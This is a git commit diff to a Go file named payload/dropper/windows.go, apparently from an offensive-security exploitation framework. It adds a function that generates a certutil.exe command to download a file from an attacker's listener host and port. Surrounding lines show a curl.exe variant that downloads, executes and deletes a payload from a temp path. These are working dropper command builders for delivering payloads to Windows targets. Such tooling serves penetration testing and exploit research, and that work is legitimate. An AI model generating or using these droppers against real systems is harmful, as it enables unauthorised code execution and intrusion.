added certutildownloadonly

lobsterjerusalem · lobsterjerusalem · commit 19d3db565c12 · 2025-07-14T17:21:24.000-06:00
diff --git a/payload/dropper/windows.go b/payload/dropper/windows.go
@@ -18,6 +18,16 @@ func (win *WindowsPayload) CurlHTTPDownloadOnly(lhost string, lport int, ssl boo
 	return fmt.Sprintf("curl.exe -so %s http://%s:%d/%s", output, lhost, lport, downloadFile)
 }
 
+// Much like CurlHTTPDownloadOnly, this function will generate the certutil.exe command to download a file and save it to the provided location.
+func CertutilHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, outputPath string) string {
+	uri := fmt.Sprintf("http://%s:%d/%s", lhost, lport, downloadFile)
+	if ssl {
+		uri = strings.Replace(uri, "http://", "https://", 1)
+	}
+
+	return fmt.Sprintf("certutil.exe -urlcache -split -f %s %s", uri, outputPath)
+}
+
 // Download a remote file with curl.exe, execute it, and delete it (after execution).
 func (win *WindowsPayload) CurlHTTP(lhost string, lport int, ssl bool, downloadFile string) string {
 	output := `%TEMP%\` + random.RandLetters(3) + ".exe"
